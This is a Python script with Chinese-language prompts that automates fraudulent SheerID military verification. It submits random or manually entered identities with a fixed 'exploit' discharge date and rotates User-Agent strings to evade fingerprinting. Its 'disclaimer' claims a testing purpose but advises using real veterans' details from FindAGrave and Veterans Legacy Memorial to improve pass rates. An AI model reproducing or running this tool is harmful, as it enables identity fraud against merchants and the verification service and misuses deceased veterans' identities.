import requests
import json
import random
import re
import time
import os
import sys
from datetime import datetime

# ================= 🌐 1. 网络代理配置 =================
# ⚠️ 请修改您的 VPN 端口号 (Clash通常是7890, v2rayN是10809)
PROXY_PORT = '8888' 

# 设置环境变量，强制走代理
os.environ['HTTP_PROXY'] = f'http://127.0.0.1:{PROXY_PORT}'
os.environ['HTTPS_PROXY'] = f'http://127.0.0.1:{PROXY_PORT}'

# ================= ⚙️ 2. 基础配置 =================
BASE_URL = "https://services.sheerid.com/rest/v2/verification"

ORGANIZATIONS = [
    {"id": 4070, "name": "Army", "label": "陆军 (Army)"},
    {"id": 4073, "name": "Air Force", "label": "空军 (Air Force)"},
    {"id": 4072, "name": "Navy", "label": "海军 (Navy)"},
    {"id": 4071, "name": "Marine Corps", "label": "海军陆战队 (Marine Corps)"},
    {"id": 4074, "name": "Coast Guard", "label": "海岸警卫队 (Coast Guard)"},
    {"id": 4544268, "name": "Space Force", "label": "太空军 (Space Force)"}
]

# ================= 🧠 数据生成模块 (扩容版) =================
class DataProvider:
    def __init__(self):
        # 🇺🇸 美国常用名大合集 (扩大数据池)
        self.first_names = [
            "James", "John", "Robert", "Michael", "William", "David", "Richard", "Charles", "Joseph", "Thomas",
            "Christopher", "Daniel", "Paul", "Mark", "Donald", "George", "Kenneth", "Steven", "Edward", "Brian",
            "Ronald", "Anthony", "Kevin", "Jason", "Matthew", "Gary", "Timothy", "Jose", "Larry", "Jeffrey",
            "Frank", "Scott", "Eric", "Stephen", "Andrew", "Raymond", "Gregory", "Joshua", "Jerry", "Dennis",
            "Walter", "Patrick", "Peter", "Harold", "Douglas", "Henry", "Carl", "Arthur", "Ryan", "Roger"
        ]
        # 🇺🇸 美国常用姓氏大合集
        self.last_names = [
            "Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia", "Miller", "Davis", "Rodriguez", "Martinez",
            "Hernandez", "Lopez", "Gonzalez", "Wilson", "Anderson", "Thomas", "Taylor", "Moore", "Jackson", "Martin",
            "Lee", "Perez", "Thompson", "White", "Harris", "Sanchez", "Clark", "Ramirez", "Lewis", "Robinson",
            "Walker", "Young", "Allen", "King", "Wright", "Scott", "Torres", "Nguyen", "Hill", "Flores",
            "Green", "Adams", "Nelson", "Baker", "Hall", "Rivera", "Campbell", "Mitchell", "Carter", "Roberts"
        ]

    def get_manual_profile(self):
        """模式1: 手动输入"""
        print("\n📝 --- 专家模式 (输入真实数据) ---")
        fn = input("名 (First Name): ").strip()
        ln = input("姓 (Last Name): ").strip()
        dob = input("出生日期 (YYYY-MM-DD)（年-月-日）: ").strip()
        
        print("选择军种 (默认1):")
        for i, o in enumerate(ORGANIZATIONS):
            print(f"{i+1}. {o['label']}")
        try:
            idx = int(input("序号: ")) - 1
            org = ORGANIZATIONS[idx]
        except:
            org = ORGANIZATIONS[0]
            
        return {"firstName": fn, "lastName": ln, "birthDate": dob, "organization": org}

    def get_random_profile(self):
        """模式2: 随机 (从大数据库中抽取)"""
        fn = random.choice(self.first_names)
        ln = random.choice(self.last_names)
        # 随机生成生日
        y = random.randint(1965, 1998)
        m = random.randint(1, 12)
        d = random.randint(1, 28)
        return {
            "firstName": fn,
            "lastName": ln,
            "birthDate": f"{y}-{m:02d}-{d:02d}",
            "organization": random.choice(ORGANIZATIONS)
        }

# ================= 🚀 验证核心 =================
class MilitaryVerifier:
    def __init__(self, verification_url, provider):
        self.id = self._parse_id(verification_url)
        self.provider = provider
        self.session = requests.Session()
        
        # 🟢 随机 UA (防止指纹风控)
        ua_list = [
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/123.0.0.0"
        ]
        
        self.session.headers.update({
            "User-Agent": random.choice(ua_list),
            "Content-Type": "application/json"
        })

    def _parse_id(self, text):
        if not text:
            return None
        m = re.search(r"verificationId=([a-f0-9]+)", text, re.IGNORECASE)
        if m: return m.group(1)
        if re.match(r"^[a-f0-9]{24}$", text): return text
        return None

    def run(self):
        if not self.id:
            print("❌ 无法识别 ID，请检查链接格式")
            return

        print(f"\n🔄 当前处理 ID: {self.id}")
        
        # --- 1. 选择军人状态 (已精简) ---
        print("\n🔰 [Step A] 请选择军人状态:")
        print("1. 现役军人 (ACTIVE_DUTY)")
        print("2. 退伍军人 (VETERAN) [✅ 官方推荐]") # 👈 增加了推荐标记
        print("3. 退休军人 (MILITARY_RETIREE)")      # 👈 去掉了提示文字
        
        status_choice = input("请输入 (1/2/3): ").strip()
        
        if status_choice == '1':
            selected_status = "ACTIVE_DUTY"
        elif status_choice == '3':
            # 内部依然保留防错逻辑，防止因为不支持 Retiree 而直接报错
            # 如果您确定对方支持 Retiree，可以将下面这行改为 selected_status = "MILITARY_RETIREE"
            selected_status = "VETERAN" 
        else:
            selected_status = "VETERAN" # 默认
        
        print(f"👉 提交状态: {selected_status}")

        # --- 2. 选择数据模式 ---
        print("\n🛠️ [Step B] 选择数据来源:")
        print("1. 📝 手动输入 (最稳，建议配合真实历史数据)")
        print("2. 🎲 随机生成 (速度快，但可能被秒拒)")
        
        choice = input("请输入 (1/2): ").strip()
        
        if choice == '1':
            profile = self.provider.get_manual_profile()
        else:
            profile = self.provider.get_random_profile()

        # --- 3. 邮箱与漏洞日期 ---
        print("\n📧 邮箱设置:")
        user_email = input("请输入真实邮箱 (回车自动生成假邮箱): ").strip()
        if user_email:
            email = user_email
        else:
            email = f"{profile['firstName'].lower()}.{profile['lastName'].lower()}.{random.randint(100,9999)}@gmail.com"

        # 锁定漏洞日期
        exploit_date = "2025-01-01"

        # --- 4. 核对 ---
        print("\n" + "="*50)
        print(f"🧐 请核对提交信息")
        print("="*50)
        print(f"身份状态   : {selected_status}")
        print(f"姓名       : {profile['firstName']} {profile['lastName']}")
        print(f"生日       : {profile['birthDate']}")
        print(f"军种       : {profile['organization']['name']}")
        print(f"邮箱       : {email}")
        print("-" * 50)
        print(f"🔥 强制退伍 : {exploit_date}")
        print("="*50)

        confirm = input("确认提交? (回车确认 / n退出): ").strip()
        if confirm.lower() == 'n': return

        try:
            # === Step 1: 提交状态 ===
            print(f"\n[Step 1] 激活状态 ({selected_status})...")
            r1 = self.session.post(f"{BASE_URL}/{self.id}/step/collectMilitaryStatus", json={"status": selected_status})
            
            if r1.status_code != 200:
                print(f"❌ Step 1 失败: {r1.text}")
                return
            
            sub_url = r1.json().get("submissionUrl")
            
            # === Step 2: 提交表单 ===
            print("[Step 2] 提交详细资料...")
            
            metadata = json.dumps({
                "doc-upload-considerations": "default", 
                "org-search-overlay": "default", 
                "org-selected-display": "default"
            })
            privacy = 'By submitting the personal information above...'

            payload = {
                "firstName": profile['firstName'], 
                "lastName": profile['lastName'],
                "birthDate": profile['birthDate'], 
                "email": email,
                "organization": {"id": profile['organization']['id'], "name": profile['organization']['name']},
                "dischargeDate": exploit_date,
                "metadata": {
                    "marketConsentValue": False, 
                    "verificationId": self.id,
                    "flags": metadata, 
                    "submissionOptIn": privacy
                }
            }

            r2 = self.session.post(sub_url, json=payload)
            res = r2.json()
            step = res.get("currentStep")

            # === 结果输出 ===
            print("\n" + "="*40)
            if step == "success":
                print(f"🎉🎉🎉 认证成功！(秒过) 🎉🎉🎉")
                print(f"🔗 领取链接: {res.get('redirectUrl')}")
            elif step == "emailLoop":
                print(f"📧 邮件已发送 (emailLoop)")
                print(f"👉 请登录 {email} 点击验证链接")
            elif step == "docUpload":
                print(f"⚠️ 需上传证件")
                print(f"🔗 上传地址: {res.get('redirectUrl')}")
            else:
                print(f"❓ 未知状态: {step}")
                print(f"完整响应: {res}")
            print("="*40)

        except Exception as e:
            print(f"❌ 网络错误 (请检查代理): {e}")

def show_disclaimer():
    """显示安全/免责公告"""
    print("\n" + "!" * 60)
    print("⚠️  安全与使用公告 (DISCLAIMER)  ⚠️")
    print("!" * 60)
    print("1. 本工具仅用于自动化测试与学习，请勿用于非法欺诈行为。")
    print("2. 【重要】随机生成的数据 (Random Data) 无法保证 100% 通过率。")
    print("   SheerID 拥有强大的数据库校验系统，虚构身份极易被秒拒。")
    print("3. 【建议】若要提高成功率，请使用 [1. 手动模式] 并配合真实数据。")
    print("   推荐数据源: FindAGrave, Veterans Legacy Memorial 等公开历史记录。")
    print("4. 请确保您的网络代理 (Proxy) 稳定，IP 质量直接影响通过率。")
    print("!" * 60 + "\n")

if __name__ == "__main__":
    # 1. 先打印公告
    show_disclaimer()
    
    print(f"🤖 SheerID 自动化助手 (Pro版)")
    provider = DataProvider()
    
    while True:
        url = input("\n🔗 请输入新链接 (q退出): ").strip()
        if url.lower() == 'q': break
        if not url: continue
            
        MilitaryVerifier(url, provider).run()